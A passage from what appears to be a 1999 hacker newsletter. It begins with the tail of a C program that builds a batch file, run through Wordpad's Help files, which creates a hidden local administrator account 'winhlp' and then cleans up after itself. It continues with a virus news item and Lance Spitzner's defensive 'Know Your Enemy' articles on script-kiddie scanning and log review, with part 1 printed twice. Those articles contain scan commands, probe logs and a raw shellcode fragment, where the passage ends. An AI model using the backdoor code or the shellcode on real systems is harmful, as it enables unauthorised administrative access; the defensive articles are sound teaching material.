printf("with a password of \"winhlp!!\" and add it to the Local Administrators group.\n"); printf("Once this is done it will reset the files and delete itself.\n"); fprintf(fd,"net user winhlp winhlp!! /add\n"); fprintf(fd,"net localgroup administrators winhlp /add\n"); fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n"); fprintf(fd,"del wordpad.sav\n"); fprintf(fd,"del add.bat\n"); fclose(fd); printf("\nBatch file created."); printf("\n\nCreated. Now open up Wordpad and click on Help\n"); return 0; } @HWA 09.0 NAI ON GALADRIEL VIRUS ~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 22nd May 1999 on 12.18 pm CET Couple of days ago we wrote about Galadriel virus. This virus infects files with the CSC extension when an infected script is run from under CorelDraw and Corel Photo Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many scripts stop executing properly when infected and a CorelDraw error message will occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite uses a different language than the Corel script. NAI categorized this virus as Low risk, and you could update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0 @HWA 10.0 Know your enemy parts 1,2 and 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Part 1 The Attack of the Script Kiddie Know Your Enemy Lance Spitzner Last Modified: May 23, 1999 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II. How to Protect Against This Threat There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information. Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Whitepapers / Publications The Attack of the Script Kiddie Know Your Enemy Lance Spitzner Last Modified: May 23, 1999 My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy is. This military doctrine readily applies to the world of network security. Just like the military, you have resources that you are trying to protect. To help protect these resources, you need to know who your threat is and how they are going to attack. This article does just that, it discusses the methodology and tools used by one of the most common and universal threats, the Script Kiddie. Who is the Script Kiddie The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company. Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Sooner or later they find someone vulnerable. Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a common strategy, randomly search for a specific weakness, then exploit that weakness. The Threat It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems were scanned by a script kiddie who happened to be sweeping that network block. If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed, anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us. With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed. This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill. The Methodology The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First, develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability. For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems. You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held liable. Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of having to build a new database (which is the most time consuming part), the user can quickly review his archived database and compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been scanned recently does not mean you are secure. The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan the Internet. For more information on this, check out Know Your Enemy: III. These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you. The Tools The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million IPs by scanning the entire .com or .edu domain. Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better understanding of how these tools are used, check out Know Your Enemy: II. How to Protect Against This Threat There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is one of the best sources of information. Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or Armoring NT. As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can find at http://www.isc.org/bind.html. Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the threats to your network and react to these threats. Conclusion The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value. Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems against this threat. NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Part 2 Tracking their moves Know Your Enemy: II Lance Spitzner Last Modified: May 23, 1999 In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically, how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot determine, with your system logs. You may be able to determine if you are being probed, what you were being probed for, what tools were used, and if they successful. The examples provided here focus on Linux, but can apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step. However, this article is a good place to start. Securing Your Logs This article is not on Intrusion Detection, there are a variety of excellent sources that cover IDS. If you are interested in intrusion detection, I recommend checking out applicatons such as Network Flight Recorder or swatch. This article focuses on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their presence from log files (such as cloak), or alter logging all together (such as trojaned syslogd binaries). So, the first step to reviewing your logs is securing your logs. This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping you hard drive clean. This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both locally and to a remote log server. I recommend making your log server a dedicated system, ie. the only thing it should be doing is collecting logs from other systems.. If money is an issue, you can easily build a linux box to act as your log server. This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server from receiving bad or un-authorized logging information from the Internet. For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file, /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the blackhat from realizing the true destination of our remote logging. Another option for your systems is to use a secure method of logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of options. One option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source, it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source. The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You can determine if the local logs have been altered by comparing them to the remote logs. Pattern Matching By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network for a single vulnerability. If your logs show most of your systems being connected from the same remote system, on the same port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed be default. So, we would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by launching inetd with the "-t" flag., facility daemon. A typical exploit scan would look like something below. Here we have a source scanning for the wu-ftpd vulnerability. /var/log/secure Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200 Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200 Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is not always the case). This is the advantage of having a log server, you can more easily identify patterns in your network since all the logs are combined. The repeated connections to port 21, ftp, indicated they were most likely looking for the wu-ftpd exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release code for an imap exploit, you will suddenly see a rush of imaps scans in your logs. The next month you will be hit by ftp. An excellent source for current exploits is http://www.cert.org/advisories/ Sometimes, tools will scan for a variety of exploits at the same time, so you may see a single source connecting to several ports. Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers. For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the connections (see Intrusion Detection for more info on this). What's the Tool? Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses, the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two "categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the results :) sscan represents the "all purpose" Script Kiddie scanning tool, and its probably one of the best ones out there. It quickly probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user must be root to use it. The output is extremely easy to interpret (hence making it so popular): It gives a concise summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in the output, and then run the "exploit du jour". Below is an example of sscan ran against the system mozart (172.17.6.30). otto #./sscan -o 172.17.6.30 --------------------------<[ * report for host mozart * <[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]> <[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]> <[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> --<[ *OS*: mozart: os detected: redhat linux 5.1 mozart: VULN: linux box vulnerable to named overflow. -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request. -<[ *FINGER*: mozart: root: account exists. --<[ *VULN*: mozart: sendmail will 'expn' accounts for us --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow --<[ *VULN*: mozart: linux mountd remote buffer overflow ---------------------------<[ * scan of mozart completed * Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist, rather, it tells you what ports are open, you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason. It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection, various packet assembly options, both UDP and TCP scanning, randomization, etc. However, you need networking skills to use the tool and interpret the data. Below is an example of nmap ran against the same system. otto #nmap -sS -O 172.17.6.30 Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on mozart (172.17.6.30): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp time 53 open tcp domain 70 open tcp gopher 79 open tcp finger 80 open tcp http 109 open tcp pop-2 110 open tcp pop-3 111 open tcp sunrpc 143 open tcp imap2 513 open tcp login 514 open tcp shell 635 open tcp unknown 2049 open tcp nfs TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!) Remote operating system guess: Linux 2.0.35-36 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds By reviewing your logs, you can determine which of these tools were used against you. To do this, you have to understand how the tools work. First, an sscan will log in as follows (this is a default scan with no modifications to any config files): /var/log/secure Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 /var/log/maillog Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200] Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200] Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root /var/log/messages Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. I decided to included them anyway for your edification :) /var/log/httpd/access_log 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169 192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187 192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163 Notice how a complete connection was made for all the ports(SYN, SYN-ACK, ACK) then torn down. That is because sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool commonly used to sniff passwords. mozart $ cat 172.17.6.30.21-192.168.11.200.7238 220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready. As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are making a complete connection to determine what you are running. Nmap, like most port scanners, does not care what you are running, but if you are running specific services. For this, nmap has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc. For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these options, your logs will be different based on the options selected by the remote user. A connection made with the -sT flag is a complete connection, so the logs will like similar to sscan, however by default nmap scans more ports. /var/log/secure Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200 Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200 Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200 Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200 Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200 Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200 Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200 Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200 Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200 Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200 One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to determine which of the 15 was the actual source. More often, users will select the -sS flag for port scanning. This is a stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a RST. The logs from such a scan looks as follows (NOTE: Only the first five entries are included here).. /var/log/secure Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart imapd[11719]: connect from unknown Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be made, the daemon cannot determine the source system. The logs show that you have been scanned, unfortunately you do not know by whom. What is even more alarming is, on most other systems (including newer kernels of Linux), none of these errors would have been logged. To qoute Fyodor " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning before completion of the 3-way handshake) was fixed. Nmap includes other stealth option, such as -sF, -sX, -sN where various flags are used, This is what the logs look like for these scans /var/log/secure Notice something here, no logs! Scary huh, you just got scanned and didn't even know it. All three types of scans determined the same results, however you are able to fully log only the first type, -sT (full connection). To detect these stealsth scans, you will need to use a different logging application such as tcplogd, scanlogd, or ippl Some commercial Firewalls will also detect and log all of these scans (I have confirmed this on Checkpoint Firewall 1). Did They Gain Access? Once you have determined that you were scanned, and what you were looking for, the next big question is "Did they get in?". Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a buffer overflow is when a program (usually a daemon) receives more input then it expected, thus overwriting critical areas in memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt. You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow attack would look like this. Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200. Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P3Û3À°^[Í~@3Ò3À~KÚ°^FÍ~@þÂuô1À°^BÍ~@~EÀubëb^V¬<ýt^FþÀt^Këõ°0þÈ~HFÿëì^°^B~ I^FþÈ~IF^D°^F~IF^H°f1ÛþÃ~IñÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1À~IF^P°^P~IF^H° fþÃÍ~@°^A~IF^D°f³^DÍ~@ë^DëLëR1À~IF^D~IF^H°fþÃÍ~@~Hð?1ÉÍ~@°?þÁÍ~@°?þÁÍ~@¸.bin@~ 